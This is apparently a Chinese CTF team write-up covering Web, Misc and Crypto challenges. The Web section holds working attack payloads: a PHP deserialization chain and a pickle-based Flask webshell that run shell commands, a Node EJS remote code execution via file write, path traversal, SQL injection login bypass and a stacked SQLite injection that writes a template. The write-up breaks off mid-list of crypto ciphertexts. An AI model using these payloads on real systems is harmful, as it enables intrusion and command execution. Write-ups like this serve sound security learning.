Web
ez_unserialize |solved
反序列化
<?php
error_reporting(0);
highlight_file(__FILE__);
class A {
public $first;
public $step;
public $next;
public function start() {
echo $this->next;
}
}
class E {
private $you;
public $found;
private $secret = "admin123";
public function __get($name){
if($name === "secret") {
echo "<br>".$name." maybe is here!</br>";
$this->found->check();
}
}
}
class F {
public $fifth;
public $step;
public $finalstep; // u
public function check() {
if(preg_match("/U/",$this->finalstep)) {
echo "仔细想想!";
}
else {
$this->step = new $this->finalstep();
($this->step)();
}
}
}
class H {
public $who;
public $are;
public $you;
public function __construct() {
$this->you = "nobody";
}
public function __destruct() {
$this->who->start();
}
}
class N {
public $congratulation;
public $yougotit;
public function __call(string $func_name, array $args) {
return call_user_func($func_name,$args[0]);
}
}
class U {
public $almost;
public $there;
public $cmd;
public function __construct() {
$this->there = new N();
$this->cmd = $_POST['cmd'];
}
public function __invoke() {
return $this->there->system($this->cmd);
}
}
class V {
public $good;
public $keep;
public $dowhat;
public $go;
public function __toString() {
$abc = $this->dowhat;
$this->go->$abc;
return "<br>Win!!!</br>";
}
}
$u = new U();
$f = new F();
$f->finalstep = 'u'; // 使用小写 'u' 绕过 preg_match("/U/", ...)
$f->step = $u;
$e = new E();
$e->found = $f;
$v = new V();
$v->dowhat = 'secret';
$v->go = $e;
$a = new A();
$a->next = $v;
$h = new H();
$h->who = $a;
echo urlencode(serialize($h));
//payload=O%3A1%3A%22H%22%3A3%3A%7Bs%3A3%3A%22who%22%3BO%3A1%3A%22A%22%3A3%3A%7Bs%3A5%3A%22first%22%3BN%3Bs%3A4%3A%22step%22%3BN%3Bs%3A4%3A%22next%22%3BO%3A1%3A%22V%22%3A4%3A%7Bs%3A4%3A%22good%22%3BN%3Bs%3A4%3A%22keep%22%3BN%3Bs%3A6%3A%22dowhat%22%3Bs%3A6%3A%22secret%22%3Bs%3A2%3A%22go%22%3BO%3A1%3A%22E%22%3A3%3A%7Bs%3A6%3A%22%00E%00you%22%3BN%3Bs%3A5%3A%22found%22%3BO%3A1%3A%22F%22%3A3%3A%7Bs%3A5%3A%22fifth%22%3BN%3Bs%3A4%3A%22step%22%3BO%3A1%3A%22U%22%3A3%3A%7Bs%3A6%3A%22almost%22%3BN%3Bs%3A5%3A%22there%22%3BO%3A1%3A%22N%22%3A2%3A%7Bs%3A14%3A%22congratulation%22%3BN%3Bs%3A8%3A%22yougotit%22%3BN%3B%7Ds%3A3%3A%22cmd%22%3BN%3B%7Ds%3A9%3A%22finalstep%22%3Bs%3A1%3A%22u%22%3B%7Ds%3A9%3A%22%00E%00secret%22%3Bs%3A8%3A%22admin123%22%3B%7D%7D%7Ds%3A3%3A%22are%22%3BN%3Bs%3A3%3A%22you%22%3Bs%3A6%3A%22nobody%22%3B%7D&cmd=cat%20/flag
ezBlog | solved
提示游客账户,猜测guest/guest登录成功,Token是pickle序列化数据,那就会在验证身份时候触发反序列化,也没啥其他限制,直接打个flask的内存马
cbuiltins
eval
(S'app.before_request_funcs.setdefault(None,[]).append(lambda:__import__(\'os\').popen(request.args.get(\'cmd\')).read())'
tR.
staticNodeService | solved
ejs在渲染未知后缀名的模板文件时,会使用require这个后缀名,利用写文件的路由向ms模块写index文件,再渲染一个shell.ms
PUT /node_modules/ms/index HTTP/1.1
Host: 127.0.0.1:3000
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:3000/node_modules/raw-body/
Accept-Encoding: gzip, deflate, br
If-None-Match: W/"8ee-199d1afd4cb"
If-Modified-Since: Sat, 11 Oct 2025 05:13:05 GMT
Connection: keep-alive
Content-Type: application/json
Content-Length: 138
{"content":"Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZCgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCcvcmVhZGZsYWcgPiByZXMudHh0Jyk="}GET /?templ=shell.ms HTTP/1.1
Host: 127.0.0.1:3000
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:3000/node_modules/ansi-styles/
Accept-Encoding: gzip, deflate, br
If-None-Match: W/"18cd-199d1afda82"
If-Modified-Since: Sat, 11 Oct 2025 05:13:06 GMT
Connection: keep-alive然后去读res.txt
Authweb | solved
GET /login/dynamic-template?value=../../../../../proc/self/environ%23 HTTP/1.1
Host: 127.0.0.1:60000
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Referer: http://127.0.0.1:60000/upload
Ezsignin | solved
/login存在sql注入,获取Admin用户connect.sid:
POST /login HTTP/1.1
Host: 45.40.247.139:30096
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: W/"30c-DHNVxa0VphnTYJIjy4EiUOx4CDM"
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
username=Admin")+--+q&password=1/download存在文件读取:
GET /download/?filename=../app.js HTTP/1.1
Host: 45.40.247.139:30096
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://45.40.247.139:30096/
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3ArQORBzH5x3cMktwmh4bOVtqMfb4WblLh.G08Vr5WzTRGs3cu7MA5ssx%2Fkcg1HCxCOJ6ymIreM5nc
Connection: keep-alive
app.js:
const express = require('express');
const session = require('express-session');
const sqlite3 = require('sqlite3').verbose();
const path = require('path');
const fs = require('fs');
const app = express();
const db = new sqlite3.Database('./db.sqlite');
/*
FLAG in /fla4444444aaaaaagg.txt
*/
app.use(express.urlencoded({ extended: true }));
app.use(express.static(path.join(__dirname, 'public')));
app.use(session({
secret: 'welcometoycb2025',
resave: false,
saveUninitialized: true,
cookie: { secure: false }
}));
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
const checkPermission = (req, res, next) => {
if (req.path === '/login' || req.path === '/register') return next();
if (!req.session.user) return res.redirect('/login');
if (!req.session.user.isAdmin) return res.status(403).send('无权限访问');
next();
};
app.use(checkPermission);
app.get('/', (req, res) => {
fs.readdir(path.join(__dirname, 'documents'), (err, files) => {
if (err) {
console.error('读取目录时发生错误:', err);
return res.status(500).send('目录读取失败');
}
req.session.files = files;
res.render('files', { files, user: req.session.user });
});
});
app.get('/login', (req, res) => {
res.render('login');
});
app.get('/register', (req, res) => {
res.render('register');
});
app.get('/upload', (req, res) => {
if (!req.session.user) return res.redirect('/login');
res.render('upload', { user: req.session.user });
//todoing
});
app.get('/logout', (req, res) => {
req.session.destroy(err => {
if (err) {
console.error('退出时发生错误:', err);
return res.status(500).send('退出失败');
}
res.redirect('/login');
});
});
app.post('/login', async (req, res) => {
const username = req.body.username;
const password = req.body.password;
const sql = `SELECT * FROM users WHERE (username = "${username}") AND password = ("${password}")`;
db.get(sql,async (err, user) => {
if (!user) {
return res.status(401).send('账号密码出错!!');
}
req.session.user = { id: user.id, username: user.username, isAdmin: user.is_admin };
res.redirect('/');
});
});
app.post('/register', (req, res) => {
const { username, password, confirmPassword } = req.body;
if (password !== confirmPassword) {
return res.status(400).send('两次输入的密码不一致');
}
db.exec(`INSERT INTO users (username, password) VALUES ('${username}', '${password}')`, function(err) {
if (err) {
console.error('注册失败:', err);
return res.status(500).send('注册失败,用户名可能已存在');
}
res.redirect('/login');
});
});
app.get('/download', (req, res) => {
if (!req.session.user) return res.redirect('/login');
const filename = req.query.filename;
if (filename.startsWith('/')||filename.startsWith('./')) {
return res.status(400).send('WAF');
}
if (filename.includes('../../')||filename.includes('.././')||filename.includes('f')||filename.includes('//')) {
return res.status(400).send('WAF');
}
if (!filename || path.isAbsolute(filename) ) {
return res.status(400).send('无效文件名');
}
const filePath = path.join(__dirname, 'documents', filename);
if (fs.existsSync(filePath)) {
res.download(filePath);
} else {
res.status(404).send('文件不存在');
}
});
const PORT = 80;
app.listen(PORT, () => {
console.log(`Server running on http://localhost:${PORT}`);
});/register下存在堆叠注入,通过password进行注入:
test'); ATTACH DATABASE '/app/views/upload.ejs' AS temp; CREATE TABLE temp.pwn (data, TEXT); INSERT INTO temp.pwn (data) VALUES ('<%= include("/fla4444444aaaaaagg.txt") %>'); -- ('写入upload.ejs后访问/upload:
Misc
成功男人背后的女人 | solved
010打开看到一堆mkBT块,这是Adboe文件的特征
用ps可以看到另一个图层
符号分别对应二进制0和1
别笑,你试你也过不了第二关 | solved
第一关题目:
##### ##### ### # # ##### ##### ##### ##### ### # # #####
# # # # # # # # # # # # # # # # #
# # ##### # # # # # # # ##### # # # #
# # # # # # # # # # # # # # # # #
##### ##### # # ##### ##### ##### ##### ##### ##### # # ##### ##### #####第一关payload:
a="#"*5;b=" ### ";c="# ";d=" ";e=" ";f=(c+d)*2;g="\n";h=" # ";i="# #";j=" # ";k=a+d+a+d+b+d+f+a;l=c+d+h+d+i+d+f+i;m=l+j+l+g;n=c+d+h+d+a+d+f+i;o=a+d+a+d+i+d+a+d+a+d+a;p=k+e+a+e+k+g+m+n+j+n+g+m+o+e+a+e+o;hilogo=p[:52]+p[53:140]+p[141:228]+p[229:316]+p[317:404]+p[405:]第二关题目:
请编写 code 以输出前0x114514个数的序数词后缀,长度小于37字符:
def get_ordinal(n):
if 10 <= n % 100 <= 20:
suffix = 'th'
else:
suffix = ['st', 'nd', 'rd', 'th', 'th', 'th', 'th', 'th', 'th', 'th'][n % 10 - 1]
return suffix
test_passed = True
user_function = eval(f"lambda n: {code}", {}, {})
for i in range(1, 0x114514):
if user_function(i) != get_ordinal(i):
test_passed = False'tsnrhtdd'[n%5*(n%100^15>4>n%10)::4]
帅的被人砍 | solved
流量包提取出来一个逆序7z压缩包
解压得到解密器和一张图片
解密器
//gcc -o decryptor decryptor.c -lssl -lcrypto
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/aes.h>
#include <openssl/rand.h>
#include <openssl/evp.h>
#define HEADER_SIZE 128 // 文件头部大小
void decrypt_file(const char *input_file, const char *output_file, unsigned char *key) {
FILE *in = fopen(input_file, "rb");
if (!in) {
perror("Unable to open input file");
return;
}
unsigned char header[HEADER_SIZE];
fread(header, 1, HEADER_SIZE, in);
unsigned char iv[AES_BLOCK_SIZE];
fread(iv, 1, AES_BLOCK_SIZE, in);
fseek(in, 0, SEEK_END);
long encrypted_size = ftell(in) - HEADER_SIZE - AES_BLOCK_SIZE;
fseek(in, HEADER_SIZE + AES_BLOCK_SIZE, SEEK_SET);
unsigned char *encrypted_data = malloc(encrypted_size);
fread(encrypted_data, 1, encrypted_size, in);
fclose(in);
AES_KEY decrypt_key;
AES_set_decrypt_key(key, 256, &decrypt_key);
unsigned char *decrypted_data = malloc(encrypted_size);
AES_cbc_encrypt(encrypted_data, decrypted_data, encrypted_size, &decrypt_key, iv, AES_DECRYPT);
FILE *out = fopen(output_file, "wb");
if (!out) {
perror("Unable to open output file");
free(encrypted_data);
free(decrypted_data);
return;
}
fwrite(header, 1, HEADER_SIZE, out);
fwrite(decrypted_data, 1, encrypted_size, out);
fclose(out);
free(encrypted_data);
free(decrypted_data);
}
int main() {
unsigned char key[32] = {
'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X',
'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X',
'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X',
'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X'
};
// Ҫ 任 ɻ õ key
decrypt_file(" ̬KEY .lock", " ̬KEY .re", key);
system("chmod +x ̬KEY .re");
return 0;
}
$ stegstegseek hide.jpg rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "key.txt".
[i] Extracting to "hide.jpg.out".
PZNCKSLLLNWUMILYTNQSXCIDUNBHBDFVfrom Crypto.Cipher import AES
import sys
import os
# 参数配置
HEADER_SIZE = 128
KEY_STRING = "PZNCKSLLLNWUMILYTNQSXCIDUNBHBDFV"
KEY = KEY_STRING.encode('utf-8') # 转为 bytes
BLOCK_SIZE = AES.block_size # 16
def decrypt_file(input_file, output_file):
with open(input_file, 'rb') as f:
# 1. 读取文件头 (128 字节)
header = f.read(HEADER_SIZE)
if len(header) != HEADER_SIZE:
raise ValueError("Input file too short: missing header")
# 2. 读取 IV (16 字节)
iv = f.read(BLOCK_SIZE)
if len(iv) != BLOCK_SIZE:
raise ValueError("Cannot read IV (missing or corrupted)")
# 3. 读取剩余的加密数据
encrypted_data = f.read()
if len(encrypted_data) == 0:
raise ValueError("No encrypted data found")
if len(encrypted_data) % BLOCK_SIZE != 0:
print(f"Warning: Encrypted data length ({len(encrypted_data)}) is not a multiple of {BLOCK_SIZE}.")
print("This may indicate corruption or missing padding.")
# 4. 创建 AES 解密器 (CBC 模式)
cipher = AES.new(KEY, AES.MODE_CBC, iv)
# 5. 解密
try:
decrypted_data = cipher.decrypt(encrypted_data)
# 可选:移除 PKCS#7 填充(如果加密时用了)
# padding_len = decrypted_data[-1]
# if padding_len < 16:
# decrypted_data = decrypted_data[:-padding_len]
except Exception as e:
raise RuntimeError(f"Decryption failed: {e}")
# 6. 写出结果:先写 header,再写解密数据
with open(output_file, 'wb') as f:
f.write(header)
f.write(decrypted_data)
print(f"✅ Decrypted file saved to: {output_file}")
# 尝试添加可执行权限(Linux/macOS)
try:
os.chmod(output_file, 0o755)
print(f"📁 Set executable permission for: {output_file}")
except Exception as e:
print(f"⚠️ Could not set executable permission: {e}")
# ================
# 主程序
# ================
if __name__ == "__main__":
input_file = "key.lock" # 与 C 程序一致(注意:可能含乱码)
output_file = "key.re"
# 检查输入文件是否存在
if not os.path.exists(input_file):
print(f"❌ Input file not found: {repr(input_file)}")
print("💡 Tip: Use `ls | xxd` to check the actual filename encoding.")
sys.exit(1)
try:
decrypt_file(input_file, output_file)
except Exception as e:
print(f"❌ Error: {e}")
sys.exit(1)逆向这个ELF文件和题目给出的flag-generator。逻辑是key-generator在特定时间产生的伪随机key,输入到flag-generator中产生flag。题目限定了时间,精确在分钟级,只需对60个时间戳进行爆破,找到正确key
#include <stdint.h>
#include <stdio.h>
#include <string.h>
unsigned char xor_data[] =
{
0x5E, 0x55, 0x44, 0x42, 0x5C, 0x07, 0x04, 0x0D, 0x07, 0x51,
0x01, 0x0B, 0x42, 0x01, 0x0E, 0x00, 0x05, 0x58, 0x00, 0x4B,
0x46, 0x41, 0x45, 0x4C, 0x46, 0x4A, 0x52, 0x54, 0x5F, 0x5B,
0x5D, 0x01, 0x76, 0x76, 0x60, 0x75, 0x6D, 0x7D, 0x4A, 0x57,
0x5C, 0x49, 0x53, 0x09, 0x07, 0x07, 0x04, 0x55, 0x5E, 0x40,
0x41, 0x46, 0x40, 0x59, 0x53, 0x48, 0x02, 0x01, 0x09, 0x0E,
0x02, 0x50, 0x05, 0x4B
};
int main()
{
unsigned char str[0x40],buffer[0x50];
for(time_t time = 1625131800; time < 1625131860; time++)
{
unsigned char *addr;
memset(str,0,0x40);
memset(buffer,0,0x50);
snprintf(str, 0x40, "%lld", time * time);
size_t length = strlen(str);
addr = str + length - 16;
for(int k=0; k<4; k++)
{
memcpy(buffer + 16*k, addr, 16);
}
for(int m=0; m<64; m++)
{
buffer[m] ^= xor_data[m];
}
if(!strncmp(buffer,"oeqqh2550i12v3964h5xrtttqrbmkij7",32))
{
printf("%s\n",buffer);
}
}
return 0;
}Polar | Solved
随缘翻论文搓的还原逻辑
也不是百分百过,但本地/远程都是传两次就过了
中途最大的bug之一就是传到远程发现各种变量名都不能有_,还有精简版容器把object类砍掉导致头几次运行时莫名的NameError,,,最后就是改变量名+fcache/gcache都改用普通list代替掉numpy的数组(反正能放None就行
def construction(N, K, eps):
n = int(np.log2(N))
Z = np.array([eps], dtype=float)
for rr in range(n):
m = Z.size
tmp = Z
Z = np.empty(2 * m, dtype=float)
Z[0::2] = 2 * tmp - tmp * tmp
Z[1::2] = tmp * tmp
idx = np.argpartition(Z, K)[:K]
infoidx = np.sort(idx)
frozenidx = np.setdiff1d(np.arange(N), infoidx, True)
return infoidx, frozenidx, None
def encode(u, N):
n = int(np.log2(N))
x = u.astype(int) & 1
for i in range(n):
step = 1 << i
for j in range(0, N, 2 * step):
k1 = j
k2 = j + step
top = x[k1:k2]
bot = x[k2:k2+step]
x[k1:k2] = top ^ bot
return x
def decode(y, frozenidx):
N = len(y)
n = int(np.log2(N))
u = np.zeros(N, dtype=int)
fcache = [None] * N
gcache = [None] * N
for i in range(N):
fcache[i] = y[i]
for ll in range(1, n + 1):
stride = 1 << ll
half = 1 << (ll - 1)
for block in range(0, N, stride):
for i in range(half):
a = fcache[block + i]
b = fcache[block + half + i]
if a is None or b is None:
fcache[block + i] = None
else:
fcache[block + i] = a ^ b
gcache[block + half + i] = b
for i in frozenidx:
u[i] = 0
for ll in range(n, 0, -1):
stride = 1 << ll
half = 1 << (ll - 1)
for block in range(0, N, stride):
for i in range(half):
idxtop = block + i
idxbot = block + half + i
s = u[idxtop]
b = gcache[idxbot]
if b is None:
u[idxbot] = s
else:
u[idxbot] = (s ^ b) & 1
for i in range(N):
if fcache[i] is not None:
u[i] = fcache[i]
return u
Crypto
瑞德的一生 | solved
通过已知明文攻击(已知flag的最后一位应当为b'}'),先打多元Coppersmith得到初始的y
随后可以通过“猜”来爆破下一位到底是0还是1,若为0则在c不乘以invx($$x^{-1} \bmod N$$)时就可以获得small_roots的解,否则需要乘以invx才能获得下一个$$\delta y$$;解出的$$\delta y$$继续用于下一位的解密
from sage.all import *
import itertools
n = 7494062703769887703668081866565274579333132167014632821313548612356114287792191446305040778987677683423969025588609780586722302041792065732461222120206217
x = 176589407974509728660827257088337183280645510941533692756437851307282715528543669659120503474533510718918949406280646936944629296899342927397139761503564
enc = [1719131405161789300725716547614879725769113740628924228040533454917595622840903436228598969968521441543327057141589401318966713711269892553169244263117465, 964113278787679232296826248818761720259710649328239642627188771651887183698074369890065312129654041092751189904383511692340770351754022502563890149659129, 7180032100218555793581544809570003629664245733070965678131518584876407472850051881863073521320984755175945971940415556560131906637963087186858520080371697, 7278553181711679696938086046655211422150759150466563658652641932706121629090932321563533275034734532076001967063515644128656393602962743436588691292550955, 7071562327710704879223575342701708951735351528142781335702085495652888149086906082135202373228913497958762517436624355411885769802496504666565676354985971, 3413965163746989076799750139073767902883585409040347485175384880698286295086116450668908874661042930824632513226077293241606579860623548134540683517014908, 2493137980419237578727401577689050256924458164349933679492226475837903464940854113255706502836954377682774302990058903802342341709302505294390801418750725, 703749624169528649423172151303101271192646139978197863166201332808455945099668517680963637470919081711543250526686176341295014062217859435692959000684769, 5552777372006623762153637976206247373873064461567116514205583015221459837217534008241238757247008799091465340261767773126491113196555017701224186953871694, 918649881529006356022520486484816231512805666160156627813534426042413247168928588303906281917327740699957845171374473789655487919668241329243582133954931, 6285703978527192585551573159606891208930436794516107083852218894119508169694143877674524233655827715834164790920008898708700696212875308975667988629122600, 4565821131595301933027502011473548351089153049383736095377526401155102463159616751554487101099963154256032338275289954196137233514236675026771669397448591, 7354028408293897066124750524181484721476818972892986974136543818332765017277627873430403568253740054915458886382543189082170087240348487233398435732750668, 5370948506146077094477619584844164469450740193602636179774449455880127521628083109335128118173115534332610858463108611379783295442004063901920934588114927, 5264618249900492494641837734543042035149108592251970720538191486231178008150113960789983442446591641558872707125645452698961563246034360954061831483647213, 6513125139607784795945254209394480461700344202765834488190356889718379145623802939872464483348952974980390526647516251481867437041588167465850330579763279, 52620337023290013903914225415366398097451588140952655430359196997791680150602457532377218858805375839418974188909630862874595756881940113579562243211345, 775093554420559931175017266481645409428391257845026491067921163052421942334076885330764957368346786383962145902618781943739922097363252316652283607626263, 914048088241148826108371208942589405682469984630917274361586075697273909186257822025064357297723973525670314758846319856122628945064355266653202993561072, 1718758485465991841245414039195480938522644294472549748650221527950476049304595476485962732599997579150503368277783583981982889346987154927101507640880482, 3799868282388836525794433906036101559515644339038944651012322840059136746763222453358260146393852798092848063172360236554578223426132040539709695100381135, 3541865174568168697294834871089000487969014255500915579720513796774493370375651716014189600846999507589235976876008482115085123321108899283458508107510708, 6000111495661651346419232325628380353801785608433408743076908483918697534471280088938990190215957446604722506848253899718591876551867311203096077403838985, 6253643173046003965172103471353294842929872969494447058212794601954925177820636419552603198473445815972743097407679550852152643053405332612211745405332236, 3301079724821832397643038007452730675302156610908305347778741871384798374227946277783451519330389318088909510147809102641775328974699514390298731313909687, 1248278146668201292214327233268028972221372405786614328994300795922144408065760109909225108349965423934399901773817666437324209525167313013233374255490341, 17809989234426531897711362063266000858036114386386437955591948165647126143714107280698225084031485609653761182599374776216415414615725852044222386846495, 1661946354409283005503290687407078585313095801544853478234539059133082174146794355063441110138389247071025068313051928793440081562801370934061220659218973, 3481251444257400845597778000348529981407942860518360805860568277796650499062181666607012363114372102040179799153809888913119845876313769471779340858338876, 2969490420318820259350531448006231318278582262600049331743678866118050880783483645642510041073429073243453725770720706320332268044688750661292078028979335, 3746865059857437818811880344927694504919323866440456997581938615029691388341367848168362713237849327709450905392250312067571731330018497478067686594018132, 6414151657475702425103553484192843477569332767732269426785411087092730270913003364189614686242850187047986876258300960693169393750824177216508529662234213, 797558248081581269791936744046534433754102319942346494164420485093365412310220705062195475643430216836300501373037514530383745068731206920391719336107595, 211290089421069250441951189931336059679623894381773377988081018141988531437338679750645077474735601860432864842281371819708149824891948519030895420519030, 1794231920218065197933780116555108090284583898967611429728593823431793820927924520874618656711221536385876735688904568658652603348802173053969712727002386, 3268939580240611859647828123637929700992292317648760631515072489111975481961917697818232907939233298118646952108050134720023102457396554791758521988029264, 2910400866406729971100645087368695425677190058682583258307344966890785684989660612007133955031476064701915897780213369846363057638180652762644360056492393, 1753634247360680748520396316679919584195766557657458978557525310876515530033205449036099346746308520147633420067552976918114250433680953921765598314180983, 3876905776705628742632932249284622473357566092521460519013655727145234003433056636813923927778056586962023594055056861628544916760223760117474187444496545, 5959757039471505023113810701594324587613979217054687328781590028292142374208795570511709097095700111968262827984916208477693878444057263798564347709888202, 5374212474448450659724052626650430405673802248524884606302970663761976182941855505391179280755676342662418610617277668670474814168416896429520313939597767, 2055896889185207571213280393315847560444046333513466771957557479078164806187564643168577419348237799621057031775648293598347733861490373182820677381378382, 6084180500351180667123078393533693640255690580083210646267468404882571183094540661640084049762845414479154593898375602385822298574856183074850792911106475, 3373312774563093163010129680151226058105319897529241198281250691928195482716352650367126227218466856118453618801529505737903976091284055911347689061302750, 5600613756600329901263575945885648357446016071302264740790132322511618527641942000971067162511999091860865805745249550461955543014240889756869610044386830, 565945146556577370175269421734632130524544950564185000012594191146156168497827802421464428023451361587487129791827715132740776489947656482876818041710395, 4419359702572617933720973032897202104646156281092165587096093691060322910173330285963896187228742075336248059736486715312182113162090187842887917225198105, 6732924059366668920894385271467332116626834821924295390130136750095051875943650636754241219922832137028249995112017036271155409562266791406988328139570914, 4495392885128829930220662200671891479267861280799207451437151436346621655603861139464288261571103158714822386121519285152743695793865889942477607602335718, 516191395086928212766209551469502961241039772380081865514258427895634350230591557920648679951263902670998816757819699890588888029203352232210221754736785, 4146487915484179974920534563827027195707813478625722951261821711910606845153039576521959101508563215765201044289048428600908217925837652310124915510341932, 3432461154387141838854432302561862411336401854462422257017481125487610204007668654133357657106930012600550268131672691788212721805565222845238288446619087, 3601254026199630323639535442605056670834549469220992976345167307635004486606724216487154765164573243066829330632733535122894678992653727052397053986132826, 1618063488973978707067053379809094677794500564413909131937711646498014134984829972479531757101147953755592304581380642611170793926818523115210707234712044, 3299106147405405908279511567977405684598081731617232933690852353587668822362490176897266329385254166643165981901178981601148310259069261270946712307052287, 6846858880481923863775499748822777630389003917575860624692860915711629300260394413803865317383341262667738631584376587860442474485970911811441407998869505, 3215680123677279767509383928448414910856154132962428054738233887551725977011900633509877553773159881830993305654759486684559926162336270761361352903248906, 5496469100230626535889840978610193061034187786011281763132817534290427827123490940379914187047736591224080465866972686806917004455884875885392072705136262, 2864050448866689851550126165042634463286502493605078932118550500351115607434286505518309707879537491758153292649368748959232286095713413881178866211306184, 4500794235021983581118801298719932989859621658774316125080804907737574170999060405545603577489994073878810075348075173731946880543329899745443548732444876, 1701258881406817837344122213432825514317089016840026389777486407711921900810281151668164504886822337041945914284089154555311876886738916586249310394242144, 2984171462545577867693527742598733850500836872522276155309752203056132077977619491102054726531485591179847361987296235015922863770262186186618295183723446, 1998926203120106981499354901600209873092892311318255853016669434308301371829441087485487756331320946452792335453335927680373337041761159842898915149201179, 3469492629999069000683776994430893428957909349310623249977562094476709953253742271332297853445535357225146261322101259474378435384708678748415720242467540, 3349914475771629308828905917005193744238305669008642078094341995325423686776721646729474139382764356959059181003457997283589709318709203241867049163256581, 7468392128544523237775713086484103908765148777703251720272918323202486976726742964761491640452081344737220655815645963181061363248298874559444900262714573, 1729266554298711903381745052839477316871436688839679347808674399146779681916568119199086784315276797289562994666044199187380582322617844969124430814454548, 6228538620625194287858621303133971552150705646650758139647779023432126427549820480427618151324541658924957545324616066238824061705745633641214275957991081, 3546839468720225332704665245411296743840905483219842481039719851980894104931923459881724541431075969186280998189306821850975671317650029607773347695916161, 5003551427084428983200151485032425697792005126337901966755431797351030500718183179132025845871647589818441943961234639702209617589496987864848129100127593, 6643401571072392628300121738027765343357360200657797255110143010788618241485245543978227055741141818227818343153034503487586819791678669963057997929991784, 2562918413517151253133047147553339218659758059455474492224243333036381745640439788034759400244452717377825285968188174779261990526295746984726199948357377, 7437872392009105990711193901375305261532202846600610535045509813031250270429778869989270561580501500053229850333918780287345929478293978347645384915059905, 6850572829594419931082710249610527681880536306821912519718049378340748365289283573389390433493649860281921041642014059014544763795622118890759757777078249, 5391075547621734143075000188679602652140572736807843159481908765322403510781102362672205531750495436812820132672226065133195582321646835642286378831941543, 3935125186916665518328217311726809099639764144566121189586832906641425799098767258076447046528585648386651376836505914154172263924716118916975346746484099, 4572088871540278868361905512095201060151895510763732328882273392847208802234202258956786836058932994420932737481854686339575922886423137765225784049712773, 2262643703371965676721577847097874053651347517824305607234082573017945386641624532722022439799966228277016547769814923059355040626796832522381865787641290, 2092350463144324366602244022289003459109077119526268364543250731686788098419000629227383382147140047995570425746800878972214312249056004421397989221181338, 7316680967185838685819431514989962013693801413153393375368271255171711307966620721060733924670697124665299505476656849274808551385135203863367484594415282, 3992707215646916729947167763158938832402267287149607401065208090606939456846897741262125062082608028914675505843323650110360837429016638270325538346446529, 3069746271933542384918749040106031985080879021375771977808787824764440797512721099584567534097066479635471475762441199886178414827079781736989960199117761, 1766633502410468840542337696250749470477723118225887560860892798969566958310115225512339080511591120596372154776271396511188940759539840806867695088697687, 7422176702934281594092464214932251290119989126208580876623712378595196239646922555040920923651335839658719813178585655273281566581347270942656459655633831, 1076250672488724366299364554828924941179689773925009019426859578123703178494639141377582749659649879771331267946731559750959047347777630832570175900797396, 1410907054396321048600218685349536875889137424876811975163068514508744181288075473743359405875373746597490437227185497238385367523145376472201142188317007, 1399913830686011566618870183203250354810701185080554159064967796846290561704336488321559729397413774978460864013425684578017379091810583345546666411795427, 5442664420577177620905419312024116329584632622515715585913615715633055426416008950934670882398446114586893092091857963411004865110303405260629693479911547, 5444954789918365554465548204039461146997193180749209395789901122397246308255827362981351771251560236242646255496804381448717329602292037192555016677597049, 3692498380370159772309045715435436241311628169449536956138346402344911382662589313178130546965271962111797201610136351183369686485141336803226085619418804, 1661763472840328250526914905015525414406950272006598484866292191029914199500142371574046051673263254115284188720822715119568858243297684058718905784007684, 3591970782090757037238666567970281294829543992746927793222143235830463164152104415435233805874218282003088257755255830086210161671004004657169607587797031, 6408023979766552418323731655071232468814820721387864760342245227191599544467260453668301692632258293269233587788621263414509088714249331129218692482482634, 5107805331532175484179055961952547381531796475066432203418372765456840027280422837685555493805745435808655780536058639621407087913202784702495464911546300, 4797651536825295062608601255174248375502070662844324403061332457315754966507899734291832623874042314773932234723903300304673474844878044257723908663143633, 